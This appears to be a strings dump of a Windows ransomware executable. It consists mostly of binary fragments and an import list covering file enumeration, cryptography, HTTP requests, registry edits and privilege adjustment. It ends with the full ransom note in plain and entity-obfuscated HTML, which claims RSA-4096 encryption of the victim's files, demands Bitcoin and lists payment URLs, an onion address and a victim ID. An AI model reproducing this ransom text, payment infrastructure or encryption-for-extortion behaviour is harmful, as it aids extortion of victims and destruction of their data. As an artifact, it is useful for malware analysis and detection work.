!This program cannot be run in DOS mode.
.3eRich
.text
`.rdata
@.data
.rsrc
@.reloc
B<#u
u	_^3
t+hbg
SRj@
WWj$W
WWj&W
WWj#W
T$63
D$*f
L$ Q
T$ R
D$ P
L$ Qh
T$HRV
f9|F
SVW3
WWWS
PQVS
5hDC
=T B
=T B
RPVS
=T B
=T B
SVWP
1f;2u
=LWF
h|WF
h|WF
h|WF
h|WF
h|WF
h|WF
h|WF
h|WF
h|WF
hpDC
B(h|WF
Q(h|WF
5$ B
=  B
B@htWF
Q8PRh|WF
H@htWF
htWF
htWF
H8RQh|WF
SVWj@P
D$1f
L$5j
58ZF
58ZF
58ZF
T$4j
D$@vT2
_^[3
58ZF
58ZF
j hPWF
58ZF
hPWF
SVW3
Sj1R
=DWF
D$<3
O,Qj
G0Pj
SSSSP
T$8Ph
L$8Q
T$HSR
D$\<
T$DRSPV
D$X;
D$XP
D$t;
T$pPR
T$$R
PQRW
t+hbg
jPQR
t+hbg
t+hbg
hb)!
L$4;
T$XR
t$09|$4t
L$TQW
t$(;
QSSO
+T$,
F	0C
QSSO
_^[3
P	0V
5 ZF
5$ZF
D$<95$ZF
=$ZF
$j h
9t$Dt
=4ZF
D$TP
D$Xg
D$`r
D$d:
L$PQ
T$\R
D$`WP
T$PQ
D$Xhh
;L$<}
;T$<}
;t$<}
;D$<}
D$HP
L$TQ
D$Xg
D$`r
D$d:
D$\P
L$`h
_^[3
=$ZF
D$$W
5@!B
h$EC
h8EC
hLEC
hpEC
$jDQ
T$$S
D$$h
L$$h
T$<R
Pj@Q
T$,j
T$(j
D$<P
Qj@R
D$,j
L$$Q
h$FC
h@FC
hXFC
hdFC
hpFC
9\$0
9\$$
9\$ 
9\$H
9\$<
9\$D
9\$8
9\$@
9\$4
9\$(t
T$|RP
T$`R
D$d$
D$XP
L$|QR
T$Tj
_^[3
F\ _^
SVWP
j	Qf
5H"B
P0QV
hpzF
hpzF
hpZF
hpZF
hpZF
=@!B
h4GC
w5tA;
Y_^[
hTGC
5lZF
95pWF
=lZF
=lZF
_^[h`
SVWh
hpzF
hhGC
SVW3
hpzF
L$hQ
D$hPhp
QhpzF
T$XR
L$Xj
D$8D
_^[3
u"hpGC
hlGC
u"hpGC
hlGC
_[u;
F #F
+A _
B +q$
r$^]
PQPR
F P3
PQPR
PQPR
PQPR
PQPR
PQPR
PQPR
PQPR
PQPR
PRPS
PSPR
QPQP
QPQP
PSPQ
F$P3
QPQP
QPQP
F QPQP
QPQP
PQPQ
PQPR
p$^[]
>AA6
~PWW
px;]
C$_^[
W9FxtG
CT_^[
9BPt8
N$_^[
Cx_^[
>RQ>
>g))
>LwH'
_^[]
SVWj?
PhpGC
RhtGC
Rh,HC
QhhHC
QhxHC
Sh|WF
PSQW
,SVW3
hpzF
h4U5
=l B
RPh8
QSVW
t#f;
QVVj
QRVj
hpzF
tVSW
SVWj
tASW
j PPPj
PPPh
t+hbg
USVW
_^[]
USVW
E03E
E43E
E83E
E<QR
EP3E4
ET3E8
EX3E<
E\QR
Ep3ET
Et3EX
Ex3E\
E|QR
_^[]1
USVW
_^[]
USVW
_^[]1
YY;E
SSSSS
_^[]
 SW3
8CSVh
8"uY
8"u%
_^[]
woVW
^[_3
 SW3
8CSVh
8"u]
8"u'
_^[]
VW9]
_^[]
t"Ou
=xIC
hxIC
ht"B
h\"B
uTVWh}
=4lG
h4lG
j hPLC
5,lG
5(lG
5,lG
5(lG
5 lG
hpLC
@uoW
_^[]
t'Ou
 SW3
YQPVh
t&:a
;5XxC
5XxC
Fh=0tC
=t!B
5XxC
=0tC
=0lG
5t!B
_^[]
5p!B
to=X}C
=XyC
Y_^[]
Fpt"
h0MC
Fh0tC
hXMC
5@!B
hx&B
hl&B
h`&B
hX&B
5T!B
5`!B
h(XA
PPPPP
@u^V
t%HHt
HHtXHHt
HHty+
RPSW
90tW
?If90t
@u^V
t$HHt
HHtYHHt
HHty+
RPSW
90tX
ht1B
PPPPP
<v*V
hl1B
hd1B
^SSSSS
^_[3
j0Xf
RPSW
90tN
j Xf
t!Ht
5,lG
5(lG
=`!B
_^[]
h NC
Y_^[
Y_^[
Y__^[
9csm
j@j ^V
SWf9M
j@j 
u,9E
h@NC
;= lG
~,WPV
h`NC
;5 lG
98t^
tVPV
t/9U
uNSW
VVhU
8csm
 w	f
"u	3
tAVWP
Y[_^
PPPPP
8"u8
t	j\Yf
t$9U
QQSVWh
URPQQhP
L$,3
UVWS
[_^]
SVWj
_^[]
9]$u
5(!B
9](SS
5H!B
t"SS9] u
5(!B
9] SS
v4;5
vL;5
PPPPPPPP
PPPPPPPP
QSWVj
v	N+D$
=@!B
5`!B
~%9M
QVj	
r 8^
_^[]
oV f
o^0f
of@f
onPf
ov`f
o~pf
FGIu
X^_]
FGIu
SVWUj
]_^[
;t$,v-
UQPXY]Y[
h(OC
@h$BB
%$!B
SSSSS
_^[]
WVS3
QQSVWd
QSVW
h|IC
80t/
PPPPP
SQRP
jdRP
@PVS
@PVS
Wj0S
|-;E
VVVVV
@_^]
=RCC
=MOC
=csm
8csm
9csm
~SSV
j,hpPC
~A;L
>csm
taSV
YYPV
t)SV
Hu4j
=MOC
t*=RCC
;7|G;p
9>u&
tR99u2
r,9Y
@_^[]
SSSSW
SSSSW
@PWV
_^[]
PPPPP
WVU3
v	N+D$
r"9U
r"9U
9M$u
<+t"<-t
+t HHt
PPPPP
u"9U
u	9p
u	9E
;9u	
0K;]
h(QC
@tH9
bv!Tav
`vLTav
uwvI
pp	Q
pPJC
CorExitProcess
HH:mm:ss
dddd, MMMM dd, yyyy
MM/dd/yy
December
November
October
September
August
July
June
April
March
February
January
Saturday
Friday
Thursday
Wednesday
Tuesday
Monday
Sunday
FlsFree
FlsSetValue
FlsGetValue
FlsAlloc
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
(null)
( 8PX
700WP
`h````
xpxxxx
('8PW
700PP
`h`hhh
xppwpp
 Complete Object Locator'
 Class Hierarchy Descriptor'
 Base Class Array'
 Base Class Descriptor at (
 Type Descriptor'
`local static thread guard'
`managed vectorArrayList copy constructor iterator'
`vectorArrayList vbase copy constructor iterator'
`vectorArrayList copy constructor iterator'
`dynamic atexit destructor for '
`dynamic initializer for '
`eh vectorArrayList vbase copy constructor iterator'
`eh vectorArrayList copy constructor iterator'
`managed vectorArrayList destructor iterator'
`managed vectorArrayList constructor iterator'
`placement delete[] closure'
`placement delete closure'
`omni callsig'
 delete[]
 new[]
`local vftable constructor closure'
`local vftable'
`RTTI
`udt returning'
`copy constructor closure'
`eh vectorArrayList vbase constructor iterator'
`eh vectorArrayList destructor iterator'
`eh vectorArrayList constructor iterator'
`virtual displacement map'
`vectorArrayList vbase constructor iterator'
`vectorArrayList destructor iterator'
`vectorArrayList constructor iterator'
`scalar deleting destructor'
`default constructor closure'
`vectorArrayList deleting destructor'
`vbase destructor'
`string'
`local static guard'
`typeof'
`vcall'
`vbtable'
`vftable'
operator
 delete
 new
__unaligned
__restrict
__ptr64
__eabi
__clrcall
__fastcall
__thiscall
__stdcall
__pascal
__cdecl
__based(
 !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
GetProcessWindowStation
GetUserObjectInformationW
GetLastActivePopup
GetActiveWindow
MessageBoxW
.dll
advapi32.dll
user32.dll
ws2_32.dll
ntdll.dll
winsta.dll
shell32.dll
wininet.dll
urlmon.dll
Gdi32.dll
gdiplus.dll
crypt32.dll
SHLWAPI.dll
Imagehlp.dll
psapi.dll
olE32.dll
winspool.drv
PO|?`
$P3pbiI
CW?z*Ua
zUAg
_;p\X
^uHP/
G7LD(9
;qZ7
 ~R`
<XX 
A}`UO=
G8o^
L^&<
6gs^
d+zW
An$,
Oc7*
OeMs
Ce}?
|t'(#o
]%m 
?d^#
Yaj/E
S"y2>}
%g5O$
61&0s
O\Hc
v4^fr
[pt=
WyRz]hnp6?
kT{%<
~5[I
92*Lr
~e&_V@t
\.?0
AnzY<
g=U=
@k5"
Tp.ho7Rqc
qPb;
jE<$
&v2t
D>gL
"\,g
%6sgD
swO)
"Rl(`
]%+L
oeFU
h.W7
Ie4@
F"9.F
rxDLw
?Ef>$
X3b[
1k)jU
(J~}-M
D8|G
:	xk
	zdj
SXqJ~
b(BvMP
`PoS@
VA46yd
)\l<
iiiZ
gk`'_
b+!7
MFGL
\k6h
UdesRsK
;8`&
fT1M
gJ%n$
44`o
RWO?
n{m4
DZ'E
(&"N
iqva
vEd8
/X9$
Y(t<
n~wL
3>.W
-[v4](
Z|Eqye
<+bh
XH:#
:`&/H
wnk	
:oRCv
2[Kk
gD~o
kBF|f
!QU7
>B.7
c5^4
X)gr!
t]yR
vo9B
pHua
s{*Nw
>#Fg
'H*5,
e\/m
aqyCe 
]~I.
w!K|
:@ixgP`c
bm+U-
~~Ch&
9#GT
VkAM
LER0mn
QG=:a
VY2-V/
j8xP
IyWy|
QlCqk
y}Q(
Umq#
8=p@:
bt~z
4)'_
5<Df[
Kp	*b
v:ZC{}k7]
Jrlq
7"5nJ_
-:GJA
.,QM
M4}?Jd
a0Hj`
UeP6
^cS>a
*267
9}#q
P;s#
oTchNu
RfESR x{B
Fzbhp/
k*..v
$B{Db
\6"n
:|CD
]'[Jr(
m Tt
eOp2k
9st7
QM'ai
Ctd1
2Hvn
E'8m(
9iH~
:/9&
jTF6>YC
r7#,
@%_S
k#E]*dH
d:\Bcdf
bb!!
mR@!
C`K=
KQ< 
y.sC"
N,U9
dD8C
kD|i
sT|/').4
,3NmZ
l]\PF
t2Ny
[a\t
6tMO
{M'r
{=LR
}1QW:
=m*8X
Nw}@
=y98
 o-m
*"\#
?.CN
GmzA
MF%C
9*/\z
0R{>
:1+g
?"'r
t1K<
{"\N
 p/r
DK1u
l@z*_
]>;iJ
6L9H
~Jh T
*x^R
MHPa
(IzH
^m?V
x)vX
al|e
469!
G!IxC
 $IH
.mCox
}pqD
Ama$x
p~:"<
jSX YC
_)4v
(NX~
)4B;eqd
% ,|
r%7dJ
;#_?
["&&
RvN+
SLi)
/"&c
5!>x
SBybw
6v%&
^I_a
|hil
ra_b
6nYQM
\]+{
kOH?
\!O2
DXKD
#{Hs
`g@+
Y|2V
H}jh:}hs
g1w)p
1N#{7!
e8i>m]
'	7$
"f;U
&?m1=I3
-I*~
vv.Q
s'jV-h3
s-:w
s%C4
'%Xy
XS(w
6dI?
,1;){
JiRi
tjAx
{vTm
 qqU{/
wsmN
-U=Q
O3,\
LE]#
8}Hr
))&4
:v?M
-R"l
:38>
WGVD
TaU+
eJ!*QS
r|fu
 '3G>
)F8r"+7k
]B!U
:E:i
,Y/w-
6E+,
S9I'
7~7]q?
7	-F[
!y*K
!bte(
:A>7t
[y"]
D@47
^cO)
Gj#t
Xv9O
;T}:
&co#
\p!r
yG.Ct
DHQi
Co#wF
?F|09V
*\,e
@o/E
}'D],
`jKN
I:wp
s*{d!
]pf>
y%+}Hb
/W'(
H7Pa
1`op
F2W8
Ebn[
F:e,
#d?K
@09S
{I&UP
<24T6
USdaG
y(w`
dR2/p
^8F7Q6
jcAA<
?KH)
zh,#
8:D8
&A1M
"//|
"?	f 
&=iI
N01R1
7asZ
o92z
m.GP
rnw`
T|/d
;6#B
1@V&
4)$|
rv-S
zjEFp
Hwwy
)5uC
~mr6
T"UK
c\l.
V na>
*g5Q
C!~;
Iu;}
ajZ3
H@0G_
[0)%
m@w(
I2`2
+sNV
=	At
e73C
>@a[
*zsd
99K:
%d$>I/c
TFP:
UG`v
Ac%i
?gA)NM
uffphL
	P@E
8@m^
LMKW
Rd%*cv
@3Z3
feQK
`m2_
Cb(2
^6`<
-GgQ{
4}l8=
:Vg3
*c{-
;	>)
BWSy
Y Go
i_~*
sPWS
F[2.swTTx
e~eE
	P?C
qlqL	
#0DN
:R:3?P
,~3y'
Laq2
-]S|
tFKe
'><,
xa##
SRQn
..-!
cVS,
6k5D\
8=MbR
DxCU
_MW*
c9D#Df
|q*;%
4Xu0>
B!-z)
?eaOmM
hcUw
6:h97SW
'AQ#
SOM5
O'WZ
'j1z
6P6UZ
vWIvfG
_0A`d
$Z\{
gEyd
@9TW*
<,o!
pZ>U
-J}3
|Vm4
9CR"
{D4jC
igo"FuOQ
.6x 	
cwz>
]kvic\
aNYr
$#\#\
>`^2
TlThS
pVXYJ
uo].
o~@H
UDs @p
FYh~
1:	G
CK='*]N
:o%xj
rX,9
/6@.
`{3f;
"`0f
y	x}
k	f&3]
Uc`4c/e
c<b!
*x!K
:Mb1
b6=LeI8YM
DK9'
zQHi
;HvY1
'T=-
9B!pU
!9sh6
zj_9
NuMb
\':Z
iu6N.
F'Z+
M	%Z
{ziG
:).= 
9U2%
d@m2N
_N|Z
TVZh
?S"p
}[Wm
yBI/G
&k^)
oMa(#w
7VaS
~E!"	
XchU
1 Je
tYPG
x"-e
|	BUd
X)+q
;'0u
C_sS
%h-:
&`6}N~
WuBK
U%]p-
3Y}E
JMxw
6zfT
O=]2
A#'9sU.
p>CJ
.>-d
s2RRH
Ve&b
)?K-
@Lj!r7
A?*8
0GU^6X
@<jb)*U
%m^i
:@vw5!Bb
^4bL
Ud-g
X+]m~
je9$
i554
	~"5A
I [4
Gg3Ux
DG$Ba
Lg-1
wu%/
3C[F
{qqo
D"7	
x>[x:
Vrl\w
2D(^v
Xj!I
w9{p<W*
|~#s
/xp-
d XI
|)+p
 eH`
lfM[Fi
Dcb 
.:^>
V6?nEc
9=)e
F345
z)g2
[8c=
0s,,
J.{"S
OW,>4g
"eFv
9j#B
wsIE
y:?>|B
TZ:4
[1jD
<#<!
JxPK
~'^K[u
~v,-
Hx23
13+:
]"%}qB
~cb)%i
)lVC
AMYT
<*M1g
T2M~
y/bI
/"VF
S~G	
^+R&e'H
CT}S
"PG:
MuK2
Z~&q
<~)D
ZdyRw
#_lE
$H8[)
jVtS
(H7^{
9S+?E+
rNf=
fB3h
u8IP
C:9D
:@W^
G'rW
V-$[M
+O ,a
E=%	"
4Wft?
k9=F
0,T}
Kb9hC
,	#r&
@LZ 
3+US
yr	_
EKeX
rV [Y
ssA1
X>kz
xhs4
,eY&
-^1-
VhF B
q+2[
@'}2
3'4.
aDOu6
;8PFR
JY|(n(W
`vX9
	`VD
~-b^8
wmY[
YAC-z
m%UH
C	>2}
S482_
*SoWBU
xt$^
p`R$
@JT2
T~CE;
OU:z
_Dzl
^}YA
z&R%
n7qI
%JC5..X?
d[z=t
0=Q$
CSYC-h
_#	<A}
.2E!g
bPy!
Zu1O
p"3#
MJcS7-:LG
4 m! 
v@t 
6v,x
Tm:B`
Mcl_
EmDh9]
Z%#>A
Zf7(F
NF_	v
sF22
sA^E)
?[z%
t#x3
#R;fr
vC*DB
@X/[]u
efgJ
(Tlg
<\@{
POTg
fOR]
'aco19L
vW uSE
2/@r
	T%}
4W*a
Mm4k
;'N7
Hg(^
}x;r
tE=^
@S`Y81qb
5-dB
VDJ%
UyJ'
LxfCP
Sk p
t	L.
T(fT
n#[o.
r~H=
19O]
*K"o
]K;r_
NMn#
\N>uAV
R>!W
<cfp
"$Qd*
Xp!<A
	}6u
o Pmf
0''F
=?'/
T81;
9;Pw
1RF^
jz#*
-{W7 
m?OUX
2/D&#'
TmVG
.e&Q&
BH/~R
]3yF
opG'o
UU|OW
ifp(:
$Zut
->)P1
+[BL
{69I@
}KOlR
I88|
/LkUSui
`9u D}
D!CG;}
u<[t$
4&Ax
J0$0
__I3
G0"rl
fb+t
2|YGCD
pu&K K@
7Smy
+CFV
.=7=
V{	S`SGU
wV>m
:z~A
3eKn
}	}Vx#
l:~V
gyfb
h5qz&,
RVdC
;>-{
XGFy
(>`R
3d]J
Yt-hK
>2N+
_7_uF
=&M7
0Yh}B
	(*h{
w[SV\
6wRI
 RE_
}kj"=
647+
me|ii
d+N^
gII}+;
L8~h
!;#t
70%cJ|
5ICZ<
ti|0F
/i`	
eEP	1
!|T@
?ur<RYg
TEk	
~U>mt!
zW;Z
9bEk
	ol3
ImFk
|&yHB
lbp<
f-YW~
5|@u
 u6U
ux+x
LjyUA
7-WB
volJ
$@x>>
]G\Fi
U5A,	
KJhZh
s@q5
ajn	
dN+N=
F<33
sG9N
7;{?aAg
j^Rb
L-5x
-(L	
qecf
&P#g
]WNG
A+fW
@dM3!N.
2bj1Q
X3l&
ax`gC
	*\0K
}L{[
nv%2
o0S8
Y3U	
jt|*
n,9e
1Iw4
\ONU
'4zS
Dh!Z
L4&U:@v
c_9X
&R I
{R41
'U&O
>@{Q
I_^D
I+,{n(
H P\]
p*Q!
T;p^
c~\V
H`?-
[Z|6
!Pp)y
."3+}]]
|_.D
G7z0
f><j
F_j'$
a itO
h8rg
mn&M
tZ1t
nJEH
9Ud'|	My
 z+)
bYRq3
JRxz
eMDU
?g_>
YO!v=
#kJ/
G]fi
IF3C
|W2?
6|@aT
yjWh
DX##-
<d2AwP
T2;!
ed_/
 \.@
E;&8D6
v) Z`
R-&%
RIPE-MD160
123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz
%X%X%X%X%X%X%X%X
XXXXXXXXXXXXX
6A@...........234234.........
NetStatisticsGet
NetApiBufferFree
CryptAcquireContextW
CryptGenRandom
CryptReleaseContext
CreateToolhelp32Snapshot
CloseToolhelp32Snapshot
Heap32First
Heap32Next
Heap32ListFirst
Heap32ListNext
Process32First
Process32Next
Thread32First
Thread32Next
Module32First
Module32Next
Wow64DisableWow64FsRedirection
Wow64RevertWow64FsRedirection
!secp256k1_fe_is_zero(&ge->x)
pubkey != NULL
input != NULL
outputlen != NULL
*outputlen >= ((flags & SECP256K1_FLAGS_BIT_COMPRESSION) ? 33 : 65)
output != NULL
seckey != NULL
secp256k1_ecmult_gen_context_is_built(&ctx->ecmult_gen_ctx)
result != NULL
point != NULL
scalar != NULL
0123456789ABCDEF
e+000
bad exception
Unknown exception
1#QNAN
1#INF
1#IND
1#SNAN
WNetCloseEnum
WNetOpenEnumW
WNetEnumResourceW
MPR.dll
GdipFree
GdipAlloc
GdipGetImageEncodersSize
GdipDisposeImage
GdipCreateBitmapFromHBITMAP
GdipGetImageEncoders
GdipSaveImageToFile
GdipCloneImage
GdiplusStartup
gdiplus.dll
PathFindExtensionW
PathFindFileNameW
SHLWAPI.dll
EnumProcesses
GetProcessImageFileNameW
PSAPI.DLL
GetFileSize
FindFirstFileW
SetFilePointer
GetDriveTypeW
HeapAlloc
GetLogicalDriveStringsW
HeapFree
GetProcessHeap
WriteFile
GlobalAlloc
GetFileAttributesW
ReadFile
CreateFileW
ExitThread
FlushFileBuffers
GlobalFree
FindClose
FindNextFileW
CloseHandle
SetFileAttributesW
GetVolumeInformationW
GetLastError
GlobalMemoryStatus
FreeLibrary
QueryPerformanceCounter
GetTickCount
LoadLibraryW
GetVersionExW
GetProcAddress
GetCurrentProcessId
ExitProcess
GetEnvironmentVariableW
CreateProcessW
Sleep
CopyFileW
GetModuleFileNameW
SetThreadPriority
DeleteFileW
GetCurrentProcess
SetLastError
LocalAlloc
GetShortPathNameW
LocalFree
KERNEL32.dll
LoadStringW
ReleaseDC
GetDC
DrawTextA
USER32.dll
CreateCompatibleBitmap
CreateCompatibleDC
SelectObject
DeleteObject
DeleteDC
GetStockObject
CreateFontW
SetBkMode
SetTextColor
GDI32.dll
RegCreateKeyExW
RegQueryValueExW
RegFlushKey
RegCloseKey
RegSetValueExW
OpenProcessToken
GetSidSubAuthority
GetTokenInformation
LookupPrivilegeValueW
AdjustTokenPrivileges
ADVAPI32.dll
SHGetFolderPathW
ShellExecuteExW
ShellExecuteW
SHGetSpecialFolderPathW
SHELL32.dll
CoCreateInstance
CoInitializeEx
ole32.dll
InternetCrackUrlA
InternetSetOptionA
HttpSendRequestA
InternetOpenA
InternetCloseHandle
WININET.dll
GetSystemTimeAsFileTime
GetModuleHandleW
DecodePointer
EnterCriticalSection
LeaveCriticalSection
HeapReAlloc
GetCommandLineW
HeapSetInformation
GetStartupInfoW
TerminateProcess
UnhandledExceptionFilter
SetUnhandledExceptionFilter
IsDebuggerPresent
HeapCreate
GetCPInfo
InterlockedIncrement
InterlockedDecrement
GetACP
GetOEMCP
IsValidCodePage
EncodePointer
TlsAlloc
TlsGetValue
TlsSetValue
TlsFree
GetCurrentThreadId
LCMapStringW
GetStdHandle
InitializeCriticalSectionAndSpinCount
DeleteCriticalSection
SetHandleCount
GetFileType
WideCharToMultiByte
GetConsoleCP
GetConsoleMode
FreeEnvironmentStringsW
GetEnvironmentStringsW
RtlUnwind
MultiByteToWideChar
GetStringTypeW
HeapSize
WriteConsoleW
SetStdHandle
IsProcessorFeaturePresent
RaiseException
00P`00P
++}V++}
&&jL&&j
66Zl66Z
??A~??A
44\h44\
11Sb11S
##eF##e
''iN''i
,,tX,,t
;;Mv;;M
)){R)){
//q^//q
  `@  `
99Kr99K
33Uf33U
<<Dx<<D
88Hp88H
!!cB!!c
==Gz==G
""fD""f
**~T**~
22Vd22V
::Nt::N
$$lH$$l
77Yn77Y
%%oJ%%o
..r\..r
>>B|>>B
55_j55_
((xP((x
--wZ--w
R~AeS~Ae	
j:'^
+NpHhXpHh
@CFg
lZrNlZr
X6-9'6-9
[TE$6.:$6.
 ?ZwKiZwK
&O\r
gDf;
?uV},
bT~FbT~F
*?#1*?#
f1tN
JFeQ
+8$4,8$4
%w(<I
!Hl\tHl\
.?AVtype_info@@
                          
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
                          
                        
        
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
frP 
31,d;
l9u9
1ez6
;a-x=L
"J~8
TM5E
MzIA%
QzNak
 \q`
tEs\\
J	NMr
~,/A
joE8
0-pW}
&,4sG
_e@mDvhcgv
=C6<i
gBel
RvdlA
_|&;
W:4*
DW<=a%2
-p$n
 /:'
w^%.8
	OyM
l-=u
	P"E
`>GC#J
7d;Tt|~
 s-0M.
	)_J
~=lN
>3+1yC
EFBA#$
8`~Y9o
N>~o
my:;"
=^Br
"D]<
oC%^-l
W%D1
I\XT
hW,U
`U[@
sD`:
5H**O
e69;T%
~W-m
8WrAB
e.mx
t+x^\c
!r0!
t7EG
A>Fv
s`7\R
#|p_D
jRN[
Q#_^g
&O&"8
fwPx
y2Q;
#!AV
QLfH
ZG><
,.|^?
ml	y
uHp3kO
x&)X
9j`5
[M"I
TJ?0
sE 4zg
U2smc
D[Vq
Vqv 
].vj
D8Hv
8k4<
"`M	
WcjCo
/zt$
dQnL
wlM#@
qmhTCVbK
Gg7p
(OqK
XR0k
&m>`2
Yg/T
"TC~l
f=>m97
/n6>C
b"yC
g5A3S
Z7PV+}
w9}J
{Jnr
l;5^
$;;&sl
`XD4
Qqt)
Q.,J
CeBu
cb%O
*y#T
VZ}`
:2!F
2'g=ZN
Y<2e
-*g~
Cts_
G/Eu
#,pT
Qr"k*0
KYF~
3ArQC!
L)EP
dYA$
hs\3
$G$knoZ
bSK%
Zt?P
!b	u
|J/T
*X:@
S6xe
(:z9J
vgY1
IW^F
S%?.
IoJT	<
!M|$
<2 Lk
9X9,
GOCaWT
Gth'
I[X"%z
$@Ny7
	w(Q
[)|DV
5&ZG
# .a
{fw\
,I	dWK
G~O{
1JgX
pBiy
G.ya
.?AVGdiplusBase@Gdiplus@@
.?AVImage@Gdiplus@@
.?AVBitmap@Gdiplus@@
.?AVbad_exception@std@@
.?AVexception@std@@
kU'9
HMXB
?Zd;
?/L[
S;uD
z?aUY
D?$?
U>c{
zc%C1
.:3q
-64OS
NKeb
qfjisJH]q
u0:0q
-RCR
&>0^
A.%:9
DF'J
w-gO~p$
VF\k
rPzT
}XM*xe
wHGI 
<,hc
F`:F
5U!#
d@qG
gFQM^
I|F_,
LEOc
RBe?
NOT YOUR LANGUAGE? USE https://translate.google.com
What's the matter with your files?
Your data was secured using a strong encryption with RSA4096.
Use the link down below to find additional information on the encryption keys using RSA4096:https://en.wikipedia.org/wiki/RSA_(cryptosystem) 
What exactly that means?
It means that on a structural level your files have been transformed. You won't be able to use, read, see or work with them anymore.
In other words they are useless, however, there is a possibility to restore them with our help.
What exactly happened to your files?
*** Two personal RSA4096 keys were generated for your PC/Laptop; one key is public, another key is private.
*** All your data and files were encrypted by the means of the public key, which you received over the web.
*** In order to decrypt your data and gain access to your computer you need a private key and a decryption software, which can be found on one of our secret servers.
What should you do next?
There are several options for you to consider:
1. You can wait for a while until the price of a private key will raise, so you will have to pay twice as much to access your files or
2. You can start getting BitCoins right now and get access to your data quite fast.
In case you have valuable files, we advise you to act fast as there is no other option rather than paying in order to get back your data.
In order to obtain specific instructions, please access your personal homepage by choosing one of the few addresses down below:
http://kkr4hbwdklf234bfl84uoqleflqwrfqwuelfh.brazabaya.com/CE7BCC16BEE07D
http://974gfbjhb23hbfkyfaby3byqlyuebvly5q254y.mendilobo.com/CE7BCC16BEE07D
http://a64gfdsjhb4htbiwaysbdvukyft5q.zobodine.at/CE7BCC16BEE07D
If you can't access your personal homepage or the addresses are not working, complete the following steps:
1 Download TOR Browser - http://www.torproject.org/projects/torbrowser.html.en
2 Install TOR Browser
3 Open TOR Browser
4 Insert the following link in the address bar: k7tlx3ghr3m4n2tu.onion/CE7BCC16BEE07D
5 Follow the steps on your screen
IMPORTANT INFORMATION
Your personal homepages:
http://kkr4hbwdklf234bfl84uoqleflqwrfqwuelfh.brazabaya.com/CE7BCC16BEE07D
http://974gfbjhb23hbfkyfaby3byqlyuebvly5q254y.mendilobo.com/CE7BCC16BEE07D
http://a64gfdsjhb4htbiwaysbdvukyft5q.zobodine.at/CE7BCC16BEE07D 
Your personal page Tor-Browser k7tlx3ghr3m4n2tu.onion/CE7BCC16BEE07D
Your personal identification ID: CE7BCC16BEE07D
<html><style>a{color:green;}.tb{background:white;border-style:solid;border-width:1px;padding:3px;border-color:lime;}.ttl{font-size:13px;color:880000;}</style><body style='ba&#x63;k&#x67;rou&#x6e;&#x64;:&#x23;33&#67;&#x43;&#x46;F&#x3b;'><center> <div style='&#x74;e&#120;&#x74;-&#x61;&#x6c;i&#x67;n:le&#x66;t;&#32;f&#x6f;n&#116;&#x2d;f&#x61;mil&#121;:&#x41;rial;&#32;fon&#x74;-&#115;&#x69;ze&#x3a;1&#x33;p&#120;&#x3b; lin&#x65;&#45;&#104;eight:20px; &#109;&#97;rgin&#x2d;top:&#x31;&#x30;px; &#119;&#x69;&#100;th:800p&#120;;&#x20;backgroun&#100;:&#35;F4&#x46;&#52;F4;&#32;pa&#x64;&#100;in&#103;&#x3a;20p&#120;; bor&#x64;er&#x2d;s&#116;yl&#x65;&#58;&#x73;o&#x6c;id; border-&#x77;idth:5px; b&#111;rd&#x65;r&#x2d;c&#111;lor:#BA&#x42;ABA&#x3b;'> <b><font class='tt&#108;'><center><b>NO&#x54;&#x20;YO&#x55;R&#x20;LANGUAGE? &#85;SE&#x20;<a href=https://tra%6es&#108;ate.google.c%6f%6d target='_b&#108;ank'>Goog&#x6c;&#101;&#x20;&#x54;ranslate</a></b></center> What &#x68;appene&#x64; to your &#102;iles?</b></font><br> <font style='&#x66;on&#x74;-&#115;ize&#x3a;13p&#120;;'>A&#108;l&#x20;of&#x20;&#121;o&#x75;&#114; fi&#108;e&#x73; we&#x72;e pr&#x6f;tected by a&#32;stro&#110;&#103; encryp&#116;i&#111;&#x6e; wi&#116;h RSA4&#48;9&#x36; <br> M&#x6f;re info&#114;&#109;at&#x69;o&#x6e; a&#x62;o&#x75;&#x74; t&#104;e&#x20;&#x65;n&#99;&#x72;yp&#x74;ion RSA&#x34;096 c&#97;&#x6e; be&#32;fo&#117;nd&#x20;<a href=http://&#101;%6e.wikipe%64ia.org/%77%69ki/RS%41&#95;%28cr%79pto%73%79stem) target='_blank'> htt&#112;s&#58;//&#101;&#110;.wikiped&#105;a.&#111;rg&#47;&#119;i&#x6b;i/&#x52;S&#x41;&#95;&#40;cryptos&#121;st&#101;m&#41; </a><br></font> <br><b><font class='&#116;&#x74;&#108;'>Wh&#x61;t &#x64;oes &#x74;hi&#115; me&#x61;n&#x3f;</b></font><br><font style='f&#111;&#110;t-&#x73;ize:&#49;3&#112;&#120;&#x3b;'>This m&#101;a&#110;&#x73; that &#x74;&#104;e s&#x74;r&#117;c&#x74;ure and&#x20;data&#32;with&#105;&#110; &#x79;our fil&#101;s ha&#118;e &#x62;e&#x65;&#x6e; &#x69;&#x72;&#114;evoc&#97;bly&#x20;ch&#x61;nge&#x64;&#x2c; you&#x20;&#119;i&#x6c;l not be a&#98;le&#x20;wor&#x6b; w&#x69;th&#x20;the&#109;,&#32;r&#x65;&#97;&#x64; the&#x6d; o&#x72; s&#x65;&#x65; them&#44; &#x69;t is &#x74;&#x68;e sam&#101; thing&#x20;&#x61;s lo&#x73;ing&#x20;them forev&#101;r, b&#x75;&#x74; with our help, y&#x6f;u can r&#x65;s&#x74;or&#101; them <br><br><b><font class='&#116;tl'> &#x48;ow &#100;id &#116;his h&#x61;&#x70;&#x70;en? </b></font> <br> <font style='font&#45;si&#122;e:13&#112;x;'> E&#x73;&#x70;ec&#105;&#97;lly fo&#x72; you, o&#x6e; &#111;&#x75;&#x72;&#x20;SE&#x52;VER&#x20;&#x77;as gen&#x65;ra&#116;ed &#116;he s&#101;cr&#x65;t key <br>&#65;ll your files were&#32;enc&#114;ypte&#100;&#32;&#119;ith t&#104;e 